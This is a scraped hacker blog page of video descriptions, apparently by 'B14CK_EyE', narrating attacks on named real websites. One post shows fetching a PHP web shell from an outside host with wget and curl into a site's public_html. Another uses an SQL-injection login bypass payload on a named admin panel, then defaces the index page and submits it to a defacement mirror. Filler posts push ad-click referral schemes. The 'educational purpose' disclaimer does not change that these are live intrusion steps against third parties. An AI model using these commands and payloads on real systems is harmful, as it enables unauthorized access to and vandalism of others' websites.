984ff311a1429eb56c0a2698d31c4c45.jpg 9f5d94c0e2074a869f6079f420fad877.php a12885aa2ceb9df8c0786493809388c4.jpg a46f431bab731a701d4cbaf5fc2e661c.jpg aabbd24d0234257af4cfd8b0bc5abd7a.png b1ed2ce1f745ee9dd9272a6567ace985.pdf b50bead7ecf0ffe312a3332ad7414011.php b99fe84998276fbb891d3aa5bedf6fab.htaccess bc5cc35a46790c03c2857b398925958b.jpg c10941559c37cd36d47f0c1ed49ef8fc.pl c4c6dcf5242de219f421f0e8641616ee.jpg d0308e34cec16735b4bc7636030b0d1b.php d0bff252ccac3039922b1ac93ab7574b.html d4c8675c7372514a192fcfeb4f977926.png d5970426f46f36950fb0f8230d357474.jpg df9a981451ea205e16379b897ad60f9e.jpg dipu.txt dipu111.txt e6914cf1ed81396d65fd1da81822f628.pdf e73fea8f2d88f284d7625fdca635072c.jpg e979b5336e2072ea89579d92912d8df5.Phtml ef088a408fc90a15d646b72fad507543.php f4e5b206e2ebc3f8592a49132611d1b9.jpg fe03f957aff4b30608e2486ddc604706.jpg ff.php sp.shtml spade.php spade.txt wget
We needed to wget command or curl command to upload shell
here 1st I used wget command for upload shell :D
Here wget command not be working I used here wgethttp://privshells.com/upload/r00t.txt -o root.php
now try using curl command as like
curl http://privshells.com/upload/r00t.txt -o root.php
curl command working :D now try to find shell :D
http://www.mshospitality.in/upload/root.php not working same issue.
500 Internal server Error
so now I tried to upload shell in main directory in public_html
so now I used curl command like
curl http://privshells.com/upload/r00t.txt -o ../root.php
it's one way to upload shell in main directory another way is :D
like :D
lol uploader not working
:D
http://www.mshospitality.in/TeaMRoX.htm
Challenged completed :D
Nice.
Thanks to Chaudhary Hamza Antony Edward Stark and also My Dear Team.
Allah Hafez Thanks to watch my video
sorry for my bad connection and also bad English :
This Channel Just for Educational Purpose. One of the best ways is not responsible for the authorities. Stay With us to Learn Basic SQLi with Manual.
0 notes
Link
HelloAssalamu Alaikum Oa RahmatullahAs u know, I am B14CK_EyEToday I wanna show u how to Back Connect a website using shell without Netcat Using Python1st We needed python 2.7http://python.org/I have already installedNow we needed setuptools pythonhttps://pypi.python.org/packages/1a/31/3c29a0d6eaf8851d2031003f300b4accb724e3f5c4d519e8e7d88bc373a3/setuptools-29.0.1.zip
0 notes
Link
How To Earn Money Online 2017 with 100% Gurantee - SQLi Basic
Hello Assalamu Alaikum Oa Rahmatullah
I am B14ck_EyE as u know.
Thanks for watch my videos and subscribe my channel.
Today I wanna Show u How To Earn Money Online. It's 100% payment Gurantee
you needed to registrar payza.com / paypal.com as possible your country. I had payza account
and also needed neobux.com / ojooo.com
Let's follow me. My Neobux Reffer link: https://www.neobux.com/?r=shaon1435 My Ojooo Reffer link: http://wad.ojooo.com/register.php?ref=onlineitsection
Let's follow me.
Transaction Details for 0000000-0000-00000000
Date 11/15/2016 12:10:33 PM Reference Number 0000000-0000-00000000 Fee $0.35 USD Transaction type Transfer Received From Name/Email NeoBux [email protected] Current Status Completed Amount $2.00 USD Total Amount $1.65 USD Purchase Type Other Shipping Details Not Provided Note NeoBux Payment
After login in view Advertisements tab you had some work. Just follow hints / me.
Here had more then 20 task. Now my 1 task is complete Now you close this tab use close tab.
So, hope you understand. your Minimum Withdraw amount 1st time $2 USD
you can buy reffer as me. I already had 13 reffer. you buy reffer from here. follow me for 3 reffer = $0.6 USD as per reffer $0.20 USD
Thanks again Allah Hafez My reffer link under videos description.
sorry for my bad connection and also bad English :
This Channel Just for Educational Purpose. One of the best ways is not responsible for the authorities. Stay With us to Learn Basic SQLi with Manual.
Thanks All: ** My Channel : https://www.youtube.com/c/sqlibasic ** Another Channel: https://www.youtube.com/channel/UCJ0ZErE0Xq8TZP0_3bVxrlA ** My Facebook: https://www.facebook.com/shaifullah01 ** My Page: https://www.facebook.com/sqlibasic ** My Blog: http://sqli-basic.blogspot.com/
/**x**/ Please like my videos. /**x**/ Please subscribe my channel /**x**/ Please click on my add if u want. It's an Online It Section Please Subscribe us.
0 notes
Link
Easy SQL Challenge============================site : http://www.canuckdogs.com/?PageKey=470fcbde-7d2d-102d-a31e-4ebaba77265a
0 notes
Video
youtube
Hellow,Hope are u well.Thanks of Allah.Salam Everyone.Today I wanna show u how to add all friends in your facebook page andalso how to add all friends in your closed or public group in one click onlyyou needed to use must google chorome.lets follow me...I am member of team CTRI mean Cyber TeamRoxNow I going to invite my all friends into our team pageWe needed two addons in our browserInvite all in facebook addons for choromeandInvite all in group facebook addons for choromeright symbol for invite all friends in facebook pageand another symbol for invite all in grouplets follow me...hold for some time. it's autometically invite all new friends in your friend list.now I will invite all friends in my personal groupIt's take few minutes.and autometically done :DThanks for watch and subscribe my channel.Stay me.I am B14Ck_EyEAllah hafez.Just close it and enjoyall are links in ableavil in my website blog and youtube description.for invite group:https://chrome.google.com/webstore/detail/group-invite-all/eeajicmampllnpkmfimkhefbndkfeloofor invite like page:https://chrome.google.com/webstore/detail/invite-all-friends-on-fac/inmmhkeajgflmokoaaoadgkhhmibjbpj?hl=bn sorry for my bad connection and also bad English :This Channel Just for Educational Purpose. One of the best ways is not responsible for the authorities.Stay With us to Learn Basic SQLi with Manual.Thanks All:** My Channel : https://www.youtube.com/c/sqlibasic** My Facebook: https://www.facebook.com/shaifullah01** My Page: https://www.facebook.com/sqlibasic** My Blog: http://sqli-basic.blogspot.com//**x**/ Please like my videos./**x**/ Please subscribe my channel/**x**/ Please click on my add if u want.It's an Online It SectionPlease Subscribe us.
0 notes
Link
Hi, I am B14CK_EyE as u know. I am from Bangladesh Today I wanna show u how to hack target site, upload shell, deface index & mirror done :D
Let's follow me :D
https://sqli-basic.blogspot.com/
It's my blog :D
Please share with other's and also subscribe my channel. thanks again for subscribe my channel.
http://globalgroup.org.in/
It's the target site. as follow me :]
Not Found
The requested URL /robots.txt was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
No robots.txt in here
http://globalgroup.org.in/admin
Here had a false admin panel
Now let's try to SQLi
site:globalgroup.org.in .php?id=
It's for the find target site sql vuln.
:' No sqli able parameter in this website
try other method. try to find original admin panel using dork
site:globalgroup.org.in admin login
It's the dork for find admin panel using google
globalgroup.org.in/globaleducation/admin/login.php
Here we find original admin login panel.
now try to bypass using xpath sql injection
I wanna use ' or 1=1 limit 1 -- -+
[email protected] use like mail for here had email id :P
We can successfully logged in.
Now try to upload shell :P
Here is problem to find admin panel
so we can find another way :P
public_html Now go to public_html directory and edit index.php also put our deface code :D
and gonna to mirror in hack-mirror.com :P
now check, it's deface or not :P
Deface completed. Now gonna to hack-mirror.com for mirror this website :P
sorry for my bad connection and also bad English :
This Channel Just for Educational Purpose. One of the best ways is not responsible for the authorities. Stay With us to Learn Basic SQLi with Manual.
Thanks All: ** My Channel : https://www.youtube.com/c/sqlibasic ** My Facebook: https://www.facebook.com/shaifullah01 ** My Page: https://www.facebook.com/sqlibasic ** My Blog: http://sqli-basic.blogspot.com/
/**x**/ Please like my videos. /**x**/ Please subscribe my channel /**x**/ Please click on my add if u want.
It's an Online It Section Please Subscribe us.
0 notes